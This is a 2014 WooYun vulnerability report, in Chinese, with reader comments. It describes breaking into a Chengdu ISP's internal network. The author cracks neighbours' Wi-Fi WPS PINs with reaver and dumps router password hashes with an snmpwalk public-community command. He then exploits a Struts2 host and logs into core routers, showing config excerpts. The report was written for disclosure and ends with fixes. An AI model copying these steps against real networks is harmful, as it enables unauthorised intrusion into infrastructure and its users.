当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055272

漏洞标题:从蹭网到爱普宽带核心系统沦陷

相关厂商:艾普宽带

漏洞作者: biangbiang面

提交时间:2014-04-02 02:37

修复时间:2014-05-17 02:38

公开时间:2014-05-17 02:38

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-02: 细节已通知厂商并且等待厂商处理中
2014-04-02: 厂商已经确认,细节仅向厂商公开
2014-04-12: 细节向核心白帽子及相关领域专家公开
2014-04-22: 细节向普通白帽子公开
2014-05-02: 细节向实习白帽子公开
2014-05-17: 细节向公众公开

简要描述:

搬家暂时没拉网,于是用reaver破解有wps的无线AP密码蹭网用。
出去吃碗面的功夫,破解了十几个了,其中有一台连上去发现路由获取到的IP是内网的,便有了下文。。。

详细说明:

好奇心的驱使^_^
1.判断是什么运营商

security:~$ nslookup www.baidu.com
Server:		172.18.0.6
Address:	172.18.0.6#53
Non-authoritative answer:
www.baidu.com	canonical name = www.a.shifen.com.
Name:	www.a.shifen.com
Address: 58.217.200.15
Name:	www.a.shifen.com
Address: 58.217.200.13
security:~$ host 172.18.0.6
6.0.18.172.in-addr.arpa domain name pointer aipu-dns01.ip66.com.


经过简单的判断,发现是艾普宽带(成都地区)
2.尝试拿到DNS和出口网关的权限
a.直接扫描DNS所在网段,竟然发现可以访问到很多端口,猜测可能是vlan没有完全隔离。其中便发现一台H3C:

172.18.0.113   161/udp open	SNMP H3C Comware Platform Software, Software Version 5.20 Release 2208H3C S5500-28F-EI-DCopyright (c) 2004-2011 Hangzhou H3C Tech. Co., Ltd. All rights reserved.


b.试一下snmp漏洞:

security:~$ snmpwalk -c public -v 1 172.18.0.113 1.3.6.1.4.1.25506.2.12.1.1.1


得到密码hash,破解之。
c.telnet不能连接?登陆到web看看,发现限定了登陆ip的范围:

- 2014年04月01日 - 23时31分19秒.png


最初的打算是telnet登陆上去,做个GRE通道,这样在一个C段下,就可以更准确地探测端口开放情况。
PS:本来可以在web端手动添加规则,但为了保证不改动任何机器原本信息的前提下,不做修改。
d.既然锁定了IP范围,就尝试获取到可以进入172.18.0.113的C段机器试试:

172.18.0.90   8888/http open       struts2 vuln found


扫描到一台struts,看一下:

- 2014年04月01日 - 23时43分31秒.png


system权限的xp,发现是个运维的机子,而且此人管理了大量的系统:

屏幕截图 - 2014年04月01日 - 23时45分52秒.png


其中就有出口IP(172.18.0.1),用之前破解的H3C的帐号密码登陆,有几组是通用的:

C720_10G_A#show running
Building configuration...
Current configuration : 130718 bytes
!
! Last configuration change at 17:30:40 BeiJing Thu Mar 27 2014 by yujing
! NVRAM config last updated at 07:05:22 BeiJing Thu Mar 20 2014 by jianqingma


如果被不法分子获取,危害还是蛮大的,注意这几行:

interface Vlan106
 description wangjian_guanli_ip
 ip address 192.168.204.1 255.255.255.0
!
interface Vlan110
 description gonganju_3148guanli
 ip address 192.168.110.110 255.255.255.252


有将近4000行的配置,涉及多个vlan、Radius、迅雷、电信、网通、移动等等业务。可以端口镜像,监控成都区域的任何一个艾普网的口子。
看一下cacti的网络流量监测图:

- 2014年04月02日 - 00时03分31秒.png


e.最后通过mac地址对比发现,
网关:172.18.0.1
DNS:172.18.0.6,172.18.0.66
这三台是同一台

172.18.0.1            00-1f-c9-91-38-00     dynamic
172.18.0.6            00-1f-c9-91-38-00     dynamic
172.18.0.66           00-1f-c9-91-38-00     dynamic


至此,整个成都地区的DNS和出口设备已经完全沦陷。同时有通往广东、重庆等地艾普网络的路由,继续测试的话,其他几个地区也要遭殃!
f.另外一个运维,也是可以控制上百台的系统,这两个运维的任务量够大的啊!!!

屏幕截图 - 2014年04月02日 - 00时12分13秒.png


g.另外,内网的漏洞实在太多了,实在没有时间仔细帮你们做检查了,建议看修复方案。如果有任何疑问,我抽得出时间还是乐意帮忙。

漏洞证明:

- 2014年04月02日 - 00时17分45秒.png


屏幕截图 - 2014年04月02日 - 00时18分25秒.png

修复方案:

1.做好vlan隔离,和端口隔离(白名单),Radius用户和其他业务线的网络划分清楚,以防止不法分子破坏
2.内网的漏洞还是比较多,web、系统漏洞、默认密码、空口令等等等等,建议内部安全人员系统性地做一下测试吧

版权声明:转载请注明来源 biangbiang面@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-02 14:46

厂商回复:

感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2014-04-02 09:10 | 【|→上善若水】 ( 普通白帽子 | Rank:127 漏洞数:25 | 【|→上善若水】)

    你这节奏也太快了嘛 ,吃碗面十几个 ??

  2. 2014-04-02 09:36 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  3. 2014-04-02 09:38 | 正好五个字 ( 实习白帽子 | Rank:93 漏洞数:15 )

    求解吃碗面十几个的方法。

  4. 2014-04-02 09:42 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    跑pin码能批量了?

  5. 2014-04-02 09:54 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    我擦,被雷劈了!

  6. 2014-04-02 10:01 | 正好五个字 ( 实习白帽子 | Rank:93 漏洞数:15 )

    其实我是想知道那是谁家的碗面,这么厚道。

  7. 2014-04-02 10:23 | MarkGUN ( 路人 | Rank:13 漏洞数:2 | 我是GONG,因为我喜欢一切美好的东西,但是...)

    大神真人啊

  8. 2014-04-02 10:35 | 乌云白帽子 ( 路人 | Rank:11 漏洞数:4 | 路人甲)

    神奇的路人甲

  9. 2014-04-02 10:46 | 一剑萧寒 ( 实习白帽子 | Rank:45 漏洞数:8 | 岁月无情人愿意,为你闯开新故事...)

    求解什么面能吃这么长时间?

  10. 2014-04-02 10:58 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    我去,还真有biangbiang面——陕西关中民间传统风味面食,特指关中麦子磨成的面粉,通常手工拉成长宽厚的面条。

  11. 2014-04-02 11:06 | 银狼_avi ( 实习白帽子 | Rank:55 漏洞数:13 | 本屌十二岁破处)

    求解吃碗面十几个的方法。

  12. 2014-04-02 11:06 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    @lucky 才知道?

  13. 2014-04-02 11:44 | Coffee ( 普通白帽子 | Rank:144 漏洞数:15 | Corie, a student of RDFZ.)

    植入广告

  14. 2014-04-02 11:55 | Cpt.Tony ( 路人 | Rank:0 漏洞数:1 | 兴趣)

    论WPS的安全性。。。

  15. 2014-04-02 12:02 | 宇少 ( 普通白帽子 | Rank:106 漏洞数:41 | Jyhack-TeaM:bbs.jyhack.com 群:308694453...)

  16. 2014-04-02 12:16 | 铭哥黑马 ( 路人 | Rank:8 漏洞数:2 | 刷题群 330121504欢迎大家加入。)

    以前进去玩过,看看是不是以前我进去的那个

  17. 2014-04-02 12:20 | 铭哥黑马 ( 路人 | Rank:8 漏洞数:2 | 刷题群 330121504欢迎大家加入。)

    难道你在七家巷那里居住,??楼主你成都的?

  18. 2014-04-02 12:47 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    多大碗面

  19. 2014-04-02 12:51 | JJFly ( 路人 | Rank:2 漏洞数:1 | <a href="www.yidianjiujijifly.com">www.y...)

    被雷劈了!!!!

  20. 2014-04-02 13:15 | Cyrils ( 实习白帽子 | Rank:45 漏洞数:10 | the more the better)

    。。。跑pin能这么块。。

  21. 2014-04-02 13:26 | c2y2 ( 路人 | Rank:11 漏洞数:8 | 屌丝it男一枚)

    reaver升级版么,这么快,真牛叉

  22. 2014-04-02 13:40 | Mr.醉心 ( 路人 | Rank:2 漏洞数:2 | 爱生活,爱音乐,爱美女,更爱波多野结衣)

    求吃碗面 破解十几个的方法

  23. 2014-04-02 13:46 | Morker ( 普通白帽子 | Rank:139 漏洞数:24 | 双手是最重要的、、、)

    求吃的拉面购买地址

  24. 2014-04-03 08:41 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    不会那内网的是某ISP工程师家里的吧比我还能吃的吃货....求问破解用了多长时间

  25. 2014-04-03 09:36 | qingxp9 ( 路人 | Rank:6 漏洞数:4 | ~~~)

    用的什么网卡,这么快。。,求技术细节

  26. 2014-04-23 12:59 | also ( 普通白帽子 | Rank:424 漏洞数:52 | 招渗透/php/前端/ios&android安全,广州地...)

    能不能给我快递一碗面

  27. 2014-05-17 09:44 | 耐小心 ( 路人 | Rank:12 漏洞数:5 | 噗 我是新手 新手求罩)

    求解吃碗面十几个的方法。

  28. 2014-05-17 10:02 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    面怎么卖?

  29. 2014-05-17 14:01 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    看到网监和公安局……我先跑了

  30. 2014-05-17 16:03 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    @无敌L.t.H 网监不就是公安吗 语法错误

  31. 2014-05-17 20:38 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    @abaddon 公安是大的,网监是小的,不能同等看待。

  32. 2014-05-17 20:59 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    @无敌L.t.H 闻到网监看到刑警队 闪呼应该这样 他们在楼上?留下个爪印 喵 希望扰到楼上这个漏洞让我想起了十五年前的一本书黑客任务大曝光ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็

  33. 2014-05-17 22:46 | tSt ( 路人 | Rank:27 漏洞数:7 | 在开发里运维最强,运维里网络最强,网络里...)

    求解吃碗面十几个的方法。

  34. 2014-05-22 23:30 | Lee Swagger ( 路人 | Rank:28 漏洞数:5 | 洗洗睡吧)

    思路很清晰 下次我也整个医院沦陷的

  35. 2015-02-13 08:54 | 登录 ( 路人 | Rank:7 漏洞数:1 | 登录)

    楼主成都的?私信交个朋友